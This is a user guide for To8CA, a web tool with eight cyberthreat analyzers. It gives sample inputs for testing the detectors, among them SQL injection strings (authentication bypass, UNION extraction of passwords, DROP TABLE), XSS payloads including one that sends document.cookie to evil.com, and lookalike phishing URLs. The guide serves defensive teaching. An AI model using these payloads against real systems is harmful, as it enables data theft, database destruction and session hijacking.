To8CA To8CA

8 - CyberThreat Identification Tools

Antibody Cyber Technology, LLC

Welcome! This guide walks you through each of To8CA's eight analyzers with step-by-step instructions and safe-to-use example inputs. Whether you're a cybersecurity student, studying for a certification, or a junior analyst getting started on the job — this page will help you understand what each tool does, when to use it, and how to interpret the results.

📑 Table of Contents

  1. Phishing URL Analyzer
  2. Ransomware Indicator Lookup
  3. Denial-of-Service Traffic Analyzer
  4. Man-in-the-Middle Check
  5. SQL Injection Detector
  6. Cross-Site Scripting (XSS) Detector
  7. Zero-Day / CVE Analyzer
  8. DNS Spoofing Analyzer

🚀 Quick Start

  1. Open the Analyzer page — you'll see 8 attack categories on the left sidebar.
  2. Click an attack type to switch to that analyzer panel.
  3. Enter the indicator you want to analyze (URL, domain, CVE, log data, or suspicious input).
  4. Click the Analyze button (or press Enter).
  5. Read the results: a risk score (0–100), a risk level (clean → critical), and detailed findings with severity labels.

💡 Tip: The risk score is cumulative — each finding adds to the total. A score of 0 means no issues were detected. A score of 60+ is rated critical.

1 Phishing URL Analyzer

What it does: Examines a URL for signs of phishing — typosquatting (lookalike domains), suspicious TLDs, URL obfuscation tricks, dangerous keywords, and SSL certificate issues.

When to use it: You received a suspicious link in an email, chat message, or social media post and want to check it before clicking.

Step-by-Step

  1. 1Click "Phishing" in the sidebar (it's selected by default).
  2. 2Paste the suspicious URL into the input field.
  3. 3Click "🔍 Analyze URL".

Example Inputs to Try

Try This — A typosquatting domain mimicking Google:

https://g00gle-login.com/auth/signin

Try This — URL with @ sign obfuscation (hides real destination):

https://accounts.google.com@evil-site.tk/login

Try This — IP address instead of domain name:

http://192.168.1.50/paypal-verify/login.html

Safe Baseline — A legitimate URL (should score 0 or near 0):

https://www.google.com

What to Look For

Typosquatting detected — The domain is visually similar to a well-known brand (e.g., "g00gle" vs "google"). Severity: high.

URL contains @ sign — Browsers ignore everything before the @, so the real destination is after it. Severity: high.

Suspicious TLD — TLDs like .tk, .ml, .xyz are heavily abused by phishers. Severity: medium.

IP address in URL — Legitimate sites use domain names, not raw IPs. Severity: medium.

💡 Pro tip: If the URL starts with just a domain (e.g., "example.com"), To8CA will automatically prepend https:// for you.

2 Ransomware Indicator Lookup

What it does: Checks a CVE (Common Vulnerabilities and Exposures) ID against CISA's Known Exploited Vulnerabilities catalog to determine if it's been used in ransomware campaigns.

When to use it: Your vulnerability scanner flagged a CVE and you need to know whether ransomware groups are actively exploiting it — this helps you prioritize patching.

Step-by-Step

  1. 1Click "Ransomware" in the sidebar.
  2. 2Enter a CVE ID in the format CVE-YYYY-NNNNN.
  3. 3Click "🔍 Check CVE".

Example Inputs to Try

Try This — ConnectWise ScreenConnect auth bypass (used by multiple ransomware groups):

CVE-2024-1709

Try This — MOVEit Transfer SQLi (CL0P ransomware campaign):

CVE-2023-34362

Try This — Log4Shell (widespread exploitation):

CVE-2021-44228

What to Look For

Found in CISA KEV — This CVE is confirmed to be actively exploited in the wild. This is a critical finding and should be patched immediately.

Known Ransomware Campaign Use: Yes — CISA has specifically flagged this CVE as used in ransomware operations.

CVSS Score — The NVD severity score (0–10). Anything 9.0+ is critical.

💡 Tip: You can also use the Zero-Day / CVE Analyzer (tab 7) to search the entire KEV catalog by keyword — try searching "ransomware" to see all ransomware-linked CVEs.

3 Denial-of-Service Traffic Analyzer

What it does: Parses Apache or Nginx access logs to detect DoS attack patterns — single-IP floods, endpoint hammering, abnormal request rates, POST floods, and low IP diversity.

When to use it: Your website is responding slowly and you suspect a DoS attack. Grab a chunk of your access log and paste it here for instant analysis.

Step-by-Step

  1. 1Click "Denial-of-Service" in the sidebar.
  2. 2Paste access log lines (Apache/Nginx combined format) into the text area.
  3. 3Click "🔍 Analyze Traffic".

Example Input to Try

Try This — Simulated flood from a single IP hitting /login repeatedly:

10.0.0.5 - - [09/Apr/2026:14:00:01 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:01 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:01 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:02 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:02 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:02 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:03 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:03 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:03 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:03 +0000] "POST /login HTTP/1.1" 200 532 10.0.0.5 - - [09/Apr/2026:14:00:04 +0000] "GET /api/data HTTP/1.1" 200 845 10.0.0.5 - - [09/Apr/2026:14:00:04 +0000] "GET /api/data HTTP/1.1" 200 845 10.0.0.5 - - [09/Apr/2026:14:00:04 +0000] "GET /api/data HTTP/1.1" 200 845 192.168.1.20 - - [09/Apr/2026:14:00:04 +0000] "GET / HTTP/1.1" 200 1024 192.168.1.21 - - [09/Apr/2026:14:00:05 +0000] "GET /about HTTP/1.1" 200 512

What to Look For

Single-IP flood — One IP is responsible for a disproportionate share of traffic. Severity: high.

Endpoint hammering — The same URL is being hit repeatedly at abnormal rates. Severity: high.

POST flood — Unusually high percentage of POST requests, which are more resource-intensive for servers. Severity: medium.

Low IP diversity — Almost all traffic comes from very few IPs, suggesting a targeted attack rather than legitimate traffic. Severity: medium.

💡 How to get logs: On Linux servers, logs are typically at /var/log/apache2/access.log or /var/log/nginx/access.log. Copy a recent block with: tail -500 /var/log/nginx/access.log

4 Man-in-the-Middle Check

What it does: Combines an SSL/TLS certificate check with a DNS integrity analysis to detect conditions that could allow MitM attacks — expired certs, DNS resolution inconsistencies, missing DNSSEC, or rDNS mismatches.

When to use it: You want to verify that a connection to a domain is trustworthy and not vulnerable to interception.

Step-by-Step

  1. 1Click "Man-in-the-Middle" in the sidebar.
  2. 2Enter a domain name (e.g., example.com).
  3. 3Click "🔍 Check Connection".

Example Inputs to Try

Safe Baseline — A domain with valid SSL and DNSSEC:

cloudflare.com

Try This — Test with a known site (your own or any domain):

urlcybersecurity.com

What to Look For

SSL certificate issues — Expired, self-signed, or mismatched certificates are red flags. Severity: high.

DNS inconsistency across resolvers — If different DNS providers return different IPs, someone may be poisoning DNS. Severity: high.

No DNSSEC — Without DNSSEC, DNS responses can be spoofed without detection. Severity: medium.

Combined risk score — The MitM check adds the phishing SSL score and the DNS score together for an overall risk assessment.

💡 Tip: The MitM analyzer runs two analyses behind the scenes (Phishing SSL + DNS Spoofing) and merges the findings. This gives you a comprehensive view of connection integrity from a single input.

5 SQL Injection Detector

What it does: Scans text input against 14+ SQL injection patterns — classic UNION-based, boolean-based blind, time-based blind, stacked queries, comment injection, and more.

When to use it: You're reviewing web application logs, form submissions, or URL query parameters and want to check if they contain SQL injection attempts.

Step-by-Step

  1. 1Click "SQL Injection" in the sidebar.
  2. 2Paste the suspicious input (a query parameter value, form field, URL, etc.).
  3. 3Click "🔍 Detect Injection".

Example Inputs to Try

Try This — Classic authentication bypass:

' OR 1=1 --

Try This — UNION-based data extraction:

' UNION SELECT username, password FROM users --

Try This — Time-based blind injection:

1; WAITFOR DELAY '0:0:5' --

Try This — Stacked query with DROP TABLE:

1; DROP TABLE users; --

Safe Baseline — Normal input (should score 0):

John Smith

What to Look For

Classic SQL injection — Patterns like ' OR 1=1 try to bypass authentication by making the WHERE clause always true. Severity: critical.

UNION SELECT — Attempts to append additional query results to extract data from other tables. Severity: critical.

Time-based blind — Uses WAITFOR DELAY or SLEEP() to detect injection by measuring response time. Severity: high.

Stacked queries — Semicolons followed by dangerous commands like DROP or INSERT. Severity: critical.

⚠️ Important: These are detection patterns only. To8CA identifies whether input looks like a SQL injection attempt — it does not execute any queries. All analysis happens through pattern matching, and your input is never stored.

6 Cross-Site Scripting (XSS) Detector

What it does: Scans content for 16+ XSS payload patterns — script tags, event handlers (onclick, onerror), DOM manipulation, data URIs, JavaScript protocol handlers, and encoded payloads.

When to use it: You're reviewing user-submitted content, HTML form fields, URL parameters, or web application output for embedded XSS payloads.

Step-by-Step

  1. 1Click "Cross-Site Scripting" in the sidebar.
  2. 2Paste the suspicious HTML/JavaScript content.
  3. 3Click "🔍 Detect XSS".

Example Inputs to Try

Try This — Classic script tag injection:

<script>alert('XSS')</script>

Try This — Event handler injection (no script tag needed):

<img src=x onerror="alert(document.cookie)">

Try This — JavaScript protocol in a link:

<a href="javascript:alert('XSS')">Click me</a>

Try This — DOM manipulation payload:

<div onmouseover="document.location='http://evil.com/steal?c='+document.cookie">Hover here</div>

Safe Baseline — Normal HTML (should score 0):

<p>Welcome to our website!</p>

What to Look For

Script tag detected — The most straightforward XSS vector. Severity: critical.

Event handler — Attributes like onerror, onclick, onload can execute JavaScript without a script tag. Severity: high.

JavaScript URIjavascript: protocol in href or src attributes. Severity: high.

DOM access — References to document.cookie, document.write, or innerHTML suggest data theft or DOM tampering. Severity: high.

💡 Tip: The SQLi and XSS detectors use the same backend endpoint. If your input contains both SQL and XSS patterns, all findings will appear together — the detector checks for both automatically.

7 Zero-Day / CVE Analyzer

What it does: Looks up individual CVEs against CISA's Known Exploited Vulnerabilities (KEV) catalog and enriches them with CVSS scores from NIST NVD. Also lets you search the full KEV catalog by keyword or vendor.

When to use it: Your vulnerability scanner found a CVE and you need to know: Is it being actively exploited? What's the severity? Is there a federal deadline to patch it?

Step-by-Step: Single CVE Lookup

  1. 1Click "Zero-Day Exploits" in the sidebar.
  2. 2Enter a CVE ID (format: CVE-YYYY-NNNNN) in the top input.
  3. 3Click "🔍 Analyze CVE".

Step-by-Step: KEV Catalog Search

  1. 1Scroll down to the "Search CISA KEV Catalog" section on the same panel.
  2. 2Enter a keyword (e.g., "ransomware", "remote code execution") and/or a vendor name.
  3. 3Click "📋 Search KEV".

Example Inputs to Try

Try This — OpenSSH signal handler race condition (recent):

CVE-2024-6387

Try This — Apache Log4j (Log4Shell):

CVE-2021-44228

Try This — ProxyShell (Microsoft Exchange):

CVE-2021-34473

Try This — KEV search for all Microsoft vulnerabilities:

Keyword: (leave blank) Vendor: Microsoft

Try This — KEV search for "remote code execution":

Keyword: remote code execution Vendor: (leave blank)

What to Look For

In CISA KEV: Yes — This vulnerability is under active exploitation. Federal agencies must patch by the listed due date. You should too. Severity: critical.

CVSS Score — Sourced from NIST NVD. Scale: 0.0 (none) to 10.0 (max). 9.0+ is critical, 7.0–8.9 is high.

Required Action — CISA's recommended remediation step (e.g., "Apply vendor update").

Due Date — The federal deadline for patching. If it's past due, treat it as an emergency.

💡 Where to find CVE IDs: Vulnerability scanners (Nessus, Qualys, OpenVAS), security advisories, vendor bulletins, or search cve.org directly.

8 DNS Spoofing Analyzer

What it does: Resolves a domain across four trusted DNS providers (Google 8.8.8.8, Cloudflare 1.1.1.1, Quad9 9.9.9.9, OpenDNS 208.67.222.222), compares the results, verifies DNSSEC status, and checks forward/reverse DNS consistency.

When to use it: You suspect DNS poisoning or want to verify that a domain's DNS is resolving honestly across the internet.

Step-by-Step

  1. 1Click "DNS Spoofing" in the sidebar.
  2. 2Enter a domain name.
  3. 3Click "🔍 Check DNS".

Example Inputs to Try

Try This — A domain with full DNSSEC (should be clean):

cloudflare.com

Try This — Check if your own domain has DNSSEC:

urlcybersecurity.com

Try This — A popular site (check resolver consistency):

github.com

Try This — A cloud-hosted site (To8CA recognizes cloud providers):

netflix.com

What to Look For

All resolvers agree — All four DNS providers return the same IP(s). This is a good sign — no poisoning detected.

Resolver disagreement — Different resolvers return different IPs. This could indicate DNS cache poisoning. Severity: critical.

DNSSEC: Not enabled — The domain doesn't use DNSSEC, making it vulnerable to spoofing. Severity: medium.

DNSSEC: Enabled — DNSKEY records found. DNS responses are cryptographically signed. Good.

Cloud provider detected — If rDNS points to a cloud provider (AWS, GCP, Azure, Cloudflare, etc.), this is expected behavior and flagged as info, not a risk.

💡 DNSSEC matters: Without DNSSEC, attackers can forge DNS responses and redirect users to fake servers. If you manage a domain, enable DNSSEC at your registrar and DNS host. To8CA checks for it automatically.

📊 Understanding the Risk Score

Every analysis returns a risk score from 0 to 100 and a risk level:

Finding Severity Levels

Each individual finding within the results has its own severity:

❓ Frequently Asked Questions

Is my data stored or logged?

No. To8CA does not store, log, or track any input you submit. All analysis is performed in real-time and results are returned directly to your browser. See the Privacy Policy for details.

Can I break anything by testing?

No. All analysis is read-only and passive. Submitting a SQL injection payload to the detector does not execute SQL anywhere — it only runs regex pattern matching. Same for XSS, phishing URLs, and all other analyzers.

How current is the CISA KEV data?

To8CA fetches the KEV catalog live from CISA's API on each request. You always get the latest data.

What does "Not found in CISA KEV" mean?

It means the CVE exists but hasn't been confirmed as actively exploited in the wild by CISA. It may still be dangerous — check the CVSS score from NVD for severity.

Why does my domain show "No DNSSEC"?

Most domains don't have DNSSEC enabled. It requires configuration at both your DNS host and domain registrar. DNSSEC adds cryptographic signatures that prevent DNS spoofing.

Is there a rate limit?

Yes — 30 requests per minute per IP address. This prevents abuse while allowing normal usage. If you hit the limit, wait a moment and try again.

📖 Key Terms Glossary